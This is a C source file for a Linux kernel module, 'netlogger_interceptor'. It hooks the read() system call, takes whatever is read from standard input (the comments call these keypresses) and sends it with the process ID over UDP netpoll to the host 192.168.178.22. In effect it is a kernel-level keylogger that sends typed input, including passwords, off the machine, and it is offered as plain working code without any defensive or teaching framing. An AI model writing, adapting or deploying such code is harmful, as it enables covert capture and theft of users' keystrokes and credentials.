#include <linux/module.h> /* Needed by all modules */#include <linux/unistd.

1. #include <linux/module.h>   /* Needed by all modules */
2. #include <linux/unistd.h>   /* Needed for __NR_read */
3. #include <linux/reboot.h>   /* Needed for kernel_restart() */
4.  
5. #include <linux/string.h>
6. #include <linux/netpoll.h>
7. #include <linux/etherdevice.h>
8.  
9. #include "netlog_interceptor.h"
10. #include "core.h"
11.  
12. #define LOG_PREF "PID %d says: %s\n"
13. #define MAX_PID_CHARS 10
14. #define MOD_NAME "netlogger_interceptor"
15.  
16. int pos;
17. struct netpoll *np;
18.  
19. static void netlogger_init(void)
20. {
21.     char target_config[] = "6665@0.0.0.0/eth0,6666@192.168.178.22/ff:ff:ff:ff:ff:ff";
22.     if (np)
23.         return;
24.  
25.     np = kzalloc(sizeof(struct netpoll), GFP_KERNEL);
26.     if (!np)
27.         return;
28.  
29.     np->name = THIS_MODULE->name;
30.     strlcpy(np->dev_name, "eth0", IFNAMSIZ);
31.     np->local_port = 6665;
32.     np->remote_port = 6666;
33.     eth_broadcast_addr(np->remote_mac);
34.  
35.     if (netpoll_parse_options(np, target_config))
36.         goto fail;
37.  
38.     if (netpoll_setup(np))
39.         goto fail;
40.  
41.     return;
42.  
43. fail:
44.     kfree(np);
45.     np = NULL;
46. }
47.  
48. static void netlogger_exit(void)
49. {
50.     if (!np)
51.         return;
52.  
53.     netpoll_cleanup(np);
54.     kfree(np);
55.     np = NULL;
56. }
57.  
58. static void netlogger_send(int pid, char *buf, unsigned int len)
59. {
60.     char *msg = NULL;
61.     int msg_size = 0;
62.  
63.     if (!np)
64.         return;
65.  
66.     struct read_syscall_instrumenter x;
67.  
68.     msg_size = strlen(LOG_PREF) + len + MAX_PID_CHARS;
69.     msg = kzalloc(msg_size, GFP_KERNEL);
70.     if (!msg)
71.         return;
72.  
73.     msg_size = snprintf(msg, msg_size, LOG_PREF, pid, buf);
74.  
75.     if (msg_size <= 0) {
76.         printk(KERN_INFO "Something went wrong\n");
77.         return;
78.     }
79.  
80.     netpoll_send_udp(np, msg, msg_size);
81.     kfree(msg);
82. }
83.  
84. asmlinkage long my_read_syscall_ref(unsigned int fd, char __user *buf, size_t count, long ret)
85. {
86.     /* A keypress has a length of 1 byte and is read from STDIN (fd == 0) */
87.     if (fd != 0)
88.         return ret;
89.  
90.     netlogger_send(current->pid, buf, count);
91.     return ret;
92. }
93.  
94. /* Initialization function which is called when the module is
95.    insmoded into the kernel. It replaces the read() syscall. */
96. void interceptor_init(struct orig *original_syscalls)
97. {
98.     netlogger_init();
99.     netlogger_send(-1, "netlogger started", 17);
100.  
101.     register_read_instrumenter(my_read_syscall_ref);
102.  
103.     printk(KERN_INFO MSG_PREF(MOD_NAME)"Loaded.\n");
104. }
105.  
106. /* Cleanup function which is called just before module
107.    is rmmoded. It restores the original read() syscall. */
108.  
109. void interceptor_exit(void)
110. {
111.     deregister_read_instrumenter(my_read_syscall_ref);
112.  
113.     netlogger_send(-1, "netlogger exiting", 17);
114.     netlogger_exit();
115.  
116.     printk(KERN_INFO MSG_PREF(MOD_NAME)"unloaded\n");
117. }